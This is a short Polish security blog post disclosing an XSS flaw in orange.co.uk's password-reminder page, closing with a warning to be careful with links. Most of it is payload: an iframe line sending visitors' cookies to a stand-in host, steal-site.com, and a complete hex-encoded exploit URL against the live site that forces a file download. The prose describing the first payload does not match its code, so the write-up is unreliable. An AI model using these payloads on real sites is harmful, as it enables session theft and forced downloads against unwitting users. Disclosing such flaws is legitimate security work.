HARD CORE SECURITY LAB

Brytyjska witryna potentata z branży telefonii komórkowej http://www.orange.co.uk/ podatna jest na ataki typu XSS (ang. Cross-Site Scripting). XSS polega w skrócie na osadzeniu w treści atakowanej strony kodu, który wyświetlony innym użytkownikom może doprowadzić do wykonania przez nich niepożądanych akcji. Zapraszam do zapoznania się praktycznym przykładem tego rodzaju ataku na przykładzie witryny Orange.

Luka może również posłużyć intruzowi do podsunięcia ofierze specjalnie spreparowanego odnośnika do witryny Orange, który spowoduje u potencjalnej ofiary rozpoczęcie pobierania dowolnego pliku. Kod pozwalający na wykonanie tego typu ataku ma następującą postać:

iframe height="0" width="0" frameborder="0" src=javascript:void(document.location="http://steal-site.com/cookie.php?cookie="+document.cookie+"&iframe")/iframe

Odnośnik http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe może oczywiście zostać zastąpiony dowolnym innym adresem.

Po heksadecymalnym zakodowaniu złośliwego kodu, ostatecznie odnośnik może przyjąć następującą formę:

• http://website.orange.co.uk/index.php?module=reminder&submode=sendpw&l=en_UK_orange_uk&email=%22%3e%3c%69%66%72%61%6d%65%20%68%65%69%67%68%74%3d%22%30%22%20%77%69%64%74%68%3d%22%30%22%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%22%30%22%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%64%6f%77%6e%6c%6f%61%64%2e%6e%75%6c%6c%73%6f%66%74%2e%63%6f%6d%2f%77%69%6e%61%6d%70%2f%63%6c%69%65%6e%74%2f%77%69%6e%61%6d%70%35%35%37%32%5f%6c%69%74%65%5f%65%6e%2d%75%73%2e%65%78%65%22%3e%3c%2f%69%66%72%61%6d%65%3e

Jak każdy z nas może się przekonać, jego otwarcie spowoduje rozpoczęcie pobierania pliku winamp5572_lite_en-us.exe!

Warto więc zawsze zachować czujność, nawet w przypadku otwierania odnośników zawierających na początku adresy znanych nam witryn!

[źródło]